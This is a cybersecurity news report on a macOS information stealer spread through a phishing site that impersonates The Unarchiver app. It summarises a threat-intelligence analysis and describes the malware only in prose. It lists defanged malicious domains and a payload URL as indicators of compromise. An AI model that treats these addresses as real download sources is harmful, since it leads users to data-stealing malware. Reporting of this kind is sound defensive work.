macOS Malware Disguise As Unarchiver App Steals User Data

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Post Sharing

Since unarchiver apps are commonly used and trusted for extracting files, threat actors often abuse them to disseminate malware and other malicious files.

Recently, security analysts uncovered macOS malware that disguises itself as an “Unarchiver” app, enabling threat actors to steal user data.

During routine research, cybersecurity experts at Hunt.io discovered a phishing site masquerading as theunarchiver[.]com. This site offers a questionable disc image (TheUnarchiver.dmg).

The only difference between this website and the real one was the changed download button and domain name (tneunarchiver[.]com).

How to Build a Security Framework With Limited Resources IT Security Team (PDF) - Free Guide

macOS Malware Disguise As Unarchiver

Despite low-risk scores from Hatching Triage (1/10) and no detections on VirusTotal, there is considerable suspicion due to the deceptive domain and copied web page.

A spoofed website impersonating The Unarchiver app (Source – Hunt.io)

While previous attempts of this kind have employed similar tactics of giving out genuine software programs via phishing, such situations require careful assessment.

Consequently, a comprehensive analysis of the disk image must be done to reveal any possible subsequent malicious actions that might be not obvious during initial scanning processes as artificially low scores could result from mistakes in execution or can be misleading.

Checking signature information for TheUnarchiver.dmg using Patrick Wardle’s ‘WhatsYourSign’ tool (Source – Hunt.io)

A machine code designed for both ARM and Intel architectures was discovered inside an unsigned disk image present in the suspicious “CryptoTrade” macOS file.

WhatsYourSign result for CryptoTrade file (Source – Hunt.io)

It is compiled using Swift language; ad-hoc signing was done during its creation on macOS 14.5 (May 2024).

While the examination of its contents, including the Info.plist file and shared libraries suggest malicious intent. 

dmg file contents after mounting using hdiutil (Source – Hunt.io)

Deceptive installation processes can be concluded from the presence of codes that are likely used to capture user’s passwords.

One URL found in the strings output (https://cryptomac[.]dev/download/grabber.zip) indicates that more malware might be available.

Despite these warning signs, VirusTotal suppliers failed to mark it as malicious software since it may have been incompatible with older versions of macOS utilized in analysis sandbox environments.

The “grabber.zip” file, undetected by VirusTotal, contains 10 shell scripts designed to steal user information.

The main script sets up a directory in the user’s Library folder, collects IP information, and executes various data-grabbing scripts. 

The stolen data is then compressed and sent to a remote server. Notable features include Russian comments in one script, suggesting the malware’s origin. 

This macOS-targeted stealer, similar to Amos and Poseidon, impersonates The Unarchiver app, uses Swift, and exfiltrates data to a common URL path (/api/index.php), yet remains undetected by security vendors.

Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Free Access